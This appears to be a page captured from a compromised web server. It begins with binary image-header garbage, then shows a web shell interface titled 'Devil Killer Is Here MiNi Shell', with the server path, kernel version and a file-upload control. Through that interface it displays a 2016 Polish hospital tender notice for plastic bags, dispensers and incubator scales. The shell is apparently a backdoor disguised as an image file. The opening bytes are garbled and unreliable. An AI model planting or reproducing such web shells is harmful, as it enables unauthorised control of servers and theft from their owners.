JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160725/154157-N-2016.html

<p class="kh_header"><b>Poznań: Dostawa worków foliowych i wyrobów z folii, dozowników oraz wag elektronicznych do inkubatora Giraffe</b><br>
<b>Numer ogłoszenia: 154157 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa worków foliowych i wyrobów z folii, dozowników oraz wag elektronicznych do inkubatora Giraffe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1	Przedmiotem zamówienia jest dostawa worków foliowych i wyrobów z folii, dozowników oraz wag elektronicznych do inkubatora Giraffe określonych wg grup asortymentowych w Załączniku Nr 1 do SIWZ w podziale na części:
-  Część Nr 1: Worki foliowe
-  Część Nr 2: Worki strunowe
-  Część Nr 3: Fartuchy foliowe niesterylne
-  Część Nr 4: Dozowniki oraz ręczniki papierowe
-  Część Nr 5:  Wagi elektroniczne do inkubatora Giraffe

2.	Opis przedmiotu zamówienia wraz z wymogami Zamawiającego dotyczącymi sposobu realizacji dostawy został zawarty w Załączniku Nr 1 do specyfikacji.
3.	Wymagania w zakresie bezpieczeństwa i higieny pracy oraz bezpieczeństwa i ochrony zdrowia obowiązujące w GPSK UM zawiera Załącznik Nr  9  do specyfikacji.

4.	Warunki realizacji zamówienia:
4.1	Wykonawca zobowiązany jest do realizowania dostaw na podstawie zgłoszenia Zamawiającego dokonanego pisemnie, faksem lub drogą elektroniczną.
4.2	Dostawa przedmiotu umowy opisanego w Części Nr 1, Części Nr 2, Części Nr 3 i Części Nr 4 do siedziby Zamawiającego w terminie od 5 do 10 dni, od momentu złożenia zamówienia na zasadach określonych w  pkt. 4.1.
4.3	Dostawa przedmiotu umowy opisanego w Części Nr 5 do siedziby Zamawiającego w terminie od 21 do 30 dni, od momentu złożenia zamówienia na zasadach określonych w  pkt. 4.1.
4.4	W szczególnych przypadkach Zamawiający zastrzega sobie prawo do żądania dostaw w trybie awaryjnym tzn. w terminie skróconym do 2 dni roboczych od momentu złożenia zamówienia na zasadach określonych w  pkt. 4.1 - dotyczy Części Nr  1,  Części Nr 2, Części Nr 3 i Części Nr 4.
4.5	Dostawa  wyrobów  identycznych  z zaproponowanymi w ofercie.
4.6	Użyte przez Zamawiającego w treści specyfikacji znaki towarowe, patenty lub elementy wskazujące na miejsce pochodzenia produktu mają charakter przykładowy, a Wykonawca ma możliwość zastosowania w tym przypadku rozwiązań równoważnych. Zamawiający dopuszcza możliwość złożenia ofert równoważnych pod warunkiem, że oferowany asortyment będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych i użytkowych. Zgodnie z art. 30 ust. 5 ustawy - Prawo zamówień publicznych ciężar udowodnienia, że oferowany przedmiot zamówienia jest równoważny w stosunku do wymagań określonych przez Zamawiającego w specyfikacji spoczywa na Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7, 39.83.17.00-3, 38.31.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający  wymaga przedstawienia wraz z ofertą w szczególności:
-  Opisów oferowanych wyrobów w języku polskim i fotografii potwierdzających wymagane parametry dla przedmiotu zamówienia - dotyczy Części Nr 4  i  Części Nr 5.
Na żądanie Zamawiającego Wykonawca poświadcza autentyczność dostarczonych opisów i fotografii.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>OPIS SPOSOBU PRZYGOTOWANIA OFERT

1.	Wymagania  ogólne
1.1	Wykonawca  może  złożyć tylko  jedną  ofertę na każdą część zamówienia.
1.2	Zamawiający dopuszcza składanie  ofert częściowych zgodnie z podziałem wskazanym w Załączniku Nr 1 do SIWZ. Wykonawca może złożyć  ofertę na jedną lub więcej części zamówienia.
1.3	Oferta  musi  być  złożona  w  formie  pisemnej,  zgodnie  z  wymaganiami  opisanymi  w   niniejszej  specyfikacji.
1.4	Oferta winna  być  sporządzona  w  języku  polskim,  na  maszynie  do  pisania,  komputerze lub  inną  trwałą, czytelną techniką. Złożone materiały powinny  być  spięte,  wszystkie  strony  oferty  zawierające  jakąkolwiek  treść  winny  być ponumerowane, podpisane  przez  upoważnionego  przedstawiciela  Wykonawcy  i  opatrzone  pieczątką.  
Strony puste nie wymagają  numeracji,  podpisów  i  pieczątek.  Ewentualne  poprawki  w  tekście oferty  muszą  być  naniesione  w  czytelny  sposób,  parafowane  i  datowane  własnoręcznie  przez  osobę  podpisującą  ofertę.
1.5	Dokumenty sporządzone w języku obcym należy złożyć  wraz  z  tłumaczeniem  na  język  polski.

2	Zawartość  oferty  i  sposób  jej  przedstawienia
2.1	Ofertę stanowi wypełniony FORMULARZ OFERTY, Załącznik Nr 2  do  specyfikacji oraz niżej wymienione dokumenty:
a.	Formularz asortymentowo-cenowy:  Załącznik Nr 1 do specyfikacji.
2.2	Wraz z ofertą  należy złożyć:
a.	Oświadczenia i dokumenty  wskazane   w  rozdziale VI  specyfikacji.
b.	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c.	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.

2.3	Oferta wraz z załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.

3	Opakowanie  oferty
3.1	Wykonawca  umieszcza  ofertę  w  nieprzejrzystym,  zamkniętym  opakowaniu,  które:
a.  będzie  zaadresowane  na  Zamawiającego,
b. będzie posiadać oznaczenia: Oferta na dostawę worków foliowych i wyrobów z folii, dozowników oraz wag elektronicznych. Otwierają osoby wyznaczone do wykonania czynności w postępowaniu dnia: 08.08.2016r. o godz. 09:30.
3.2	W przypadku załączenia do oferty dokumentów, których Zamawiający nie żąda zalecane jest ich oddzielenie od oferty i oznaczenie napisem DOKUMENTY UZUPEŁNIAJACE. 

4	Tajemnica przedsiębiorstwa
4.1	Zamawiający  informuje,  iż  zgodnie  z  art. 8  w  zw.  z  art.  96  ust. 3  ustawy oferty  składane  w  postępowaniu  o zamówienie publiczne są  jawne  i  podlegają  udostępnieniu  od  chwili  ich  otwarcia. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4.

4.2	Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem TAJEMNICA PRZEDSIĘBIORSTWA lub spięte oddzielnie od pozostałych, jawnych elementów oferty. W razie braku takiego wskazania, Zamawiający uzna, że wszelkie oświadczenia i zaświadczenia składane w trakcie postępowania są jawne bez zastrzeżeń.

OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT

1.	Kryteria oceny ofert:
1.1	Przy wyborze i ocenie ofert złożonych w postępowaniu Zamawiający będzie kierował się następującymi kryteriami:
KRYTERIUM I: Cena - 90%
Kryterium CENA rozpatrywane będzie na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w FORMULARZU OFERTY. 
Wartość punktowa kryterium  CENA wyliczona zostanie wg wzoru:
		             
Ilość punktów  =  Cena oferty z najniższą ceną / Cena oferty badanej  x  100  x  90 %
			
KRYTERIUM II:  Termin dostawy - 10%
Kryterium rozpatrywane będzie na podstawie zaoferowanego przez Wykonawcę w FORMULARZU OFERTY terminu dostawy wyrażonego w dniach kalendarzowych.

Dla Części Nr 1, Części Nr 2, Części Nr 3 i Części Nr 4  Zamawiający określa najkrótszy termin dostawy - 5 dni, najdłuższy termin dostawy - 10 dni.

Dla Części Nr 5 Zamawiający określa najkrótszy termin dostawy - 21 dni, najdłuższy termin dostawy - 30 dni.

Wartość punktowa kryterium  Termin dostawy  wyliczona zostanie wg wzoru:

Ilość punktów  =  Termin dostawy najkorzystniejszy (najkrótszy) spośród złożonych ofert / Termin dostawy z oferty badanej
 x  100  x  10%
		                                      
Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych za kryterium CENA i ilości punktów przyznanych za kryterium  TERMIN DOSTAWY .
Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów. 
Wyliczenie punktów zostanie dokonane z dokładnością do dwóch miejsc po przecinku.
1.2	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wymaganiom przedstawionym w ustawie - Prawo zamówień publicznych oraz specyfikacji  i uzyska największą ilość punktów.
1.3	W  przypadku, jeżeli  nie  można  dokonać  wyboru  oferty  najkorzystniejszej  z  uwagi  na  to,  że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.
1.4	Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o  podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek  rozliczyć zgodnie  z tymi przepisami. Wykonawca, składając ofertę, informuje Zamawiającego, czy  wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa  lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.
1.5	W  przypadku, o którym mowa w art. 93 ust. 1 pkt. 4 ustawy, jeżeli złożono ofertę, której wybór  prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, do ceny najkorzystniejszej oferty lub oferty z najniższą ceną  dolicza się podatek od towarów i usług, który Zamawiający miałby obowiązek rozliczyć zgodnie z tymi przepisami.

2.	Ocena  ofert   
2.1	Komisja  przetargowa  Zamawiającego  podczas  niejawnych  posiedzeń  dokona  oceny  ofert  zgodnie  z  przepisami  ustawy  i specyfikacji.
2.2	W toku badania i oceny ofert Zamawiający może żądać od  Wykonawców wyjaśnień dotyczących  treści  złożonej  oferty.
2.3	Zamawiający  poprawia  w  ofercie;
a.     oczywiste  omyłki  pisarskie,
b.    oczywiste  omyłki  rachunkowe,  z  uwzględnieniem  konsekwencji  rachunkowych  dokonanych  poprawek,
c.   inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia,  
      niepowodujące  istotnych  zmian  w  treści  oferty,
-    niezwłocznie  zawiadamiając  o  tym  Wykonawcę,  którego  oferta  została  poprawiona.
		
UWAGA:
Zamawiający informuje, iż w treści oferty Wykonawcy poprawi w szczególności:
1.      omyłki dotyczące działań arytmetycznych na liczbach  np.:
a.	błędne obliczenie kwoty prawidłowo podanej w ofercie stawki podatku od towarów i usług, przyjmując, że podano właściwie stawkę podatku VAT
b.	błędne zsumowanie w ofercie wartości netto i kwoty podatku od towarów i usług, przyjmując, że podano właściwie wartość netto i kwotę podatku od towarów i usług
c.	błędny iloczyn cen jednostkowych i liczby jednostek miar, przyjmując, iż podano właściwie cenę jednostkową i liczbę jednostek miar
d.	błędną sumę cen za poszczególne elementy zamówienia, przyjmując, iż podano właściwie ceny za poszczególne elementy zamówienia:

2.     jeżeli nie spowoduje to istotnych zmian w treści oferty:
a. 	omyłki polegające na błędnym  wpisaniu ilości jednostek lub nazwy jednostki miary w treści złożonego przez Wykonawcę wraz z ofertą formularza cenowego dostosowując ich treść do odpowiednich dokumentów wzorcowych zamieszczonych w specyfikacji istotnych warunków zamówienia
3.     omyłki polegające na zdublowaniu tych samych pozycji  w formularzu cenowym, w  następujący  sposób:
a.	Zamawiający wykreśli z formularza cenowego zdublowane pozycje pozostawiając tylko jedną z nich,
b.	Po wykreśleniu zdublowanych pozycji Zamawiający zsumuje wartości podane w pozo-stawionych pozycjach formularza cenowego i  tak obliczoną cenę przyjmie jako cenę ofertową.

2.4	Jeżeli cena oferty wydaje się rażąco niska w stosunku do przedmiotu zamówienia i budzi wątpliwości Zamawiającego co do możliwości wykonania przedmiotu zamówienia zgodnie z wymaganiami określonymi przez Zamawiającego lub wynikającymi z odrębnych przepisów, w szczególności jest niższa o 30% od wartości zamówienia lub średniej arytmetycznej cen wszystkich złożonych ofert Zamawiający zwraca się o udzielenie wyjaśnień, w tym złożenie dowodów, dotyczących elementów oferty mających wpływ na wysokość ceny, w szczególności w zakresie:
1)	oszczędności metody wykonania zamówienia, wybranych rozwiązań technicznych, wyjątkowo sprzyjających warunków wykonywania zamówienia dostępnych dla Wykonawcy, oryginalności projektu Wykonawcy, kosztów pracy, których wartość przyjęta do ustalenia ceny nie może być niższa od minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679, z późn. zm. 2);
2)	pomocy publicznej udzielonej na podstawie odrębnych przepisów.
2.5	Obowiązek wykazania, że oferta nie zawiera rażąco niskiej ceny, spoczywa na Wykonawcy.
2.6	Zamawiający odrzuca ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdza, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin dostawy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Z uwzględnieniem zapisu art. 142 ust. 5 w zw. z art. 144 ust. 1 Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów:
2,1	aneks cenowy dopuszczający zmianę ceny w przypadku zmiany stawki VAT zgodnie z obowiązującymi przepisami, z tym że cena brutto może ulec zmianie tylko w stopniu wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostaje bez zmian,

2.2	aneks cenowy dopuszczający zmianę ceny w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. 
o minimalnym wynagrodzeniu za pracę,

2.3	aneks cenowy dopuszczający zmianę ceny w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.


2.4	aneks cenowy dopuszczający jedną zmianę ceny po upływie dwunastu miesięcy obowiązywania umowy w oparciu o wysokość wskaźnika wzrostu cen towarów i usług (wskaźnik średnioroczny) podanego w Komunikacie Prezesa Głównego Urzędu Statystycznego opublikowanego w Dzienniku Urzędowym RP Monitor Polski,
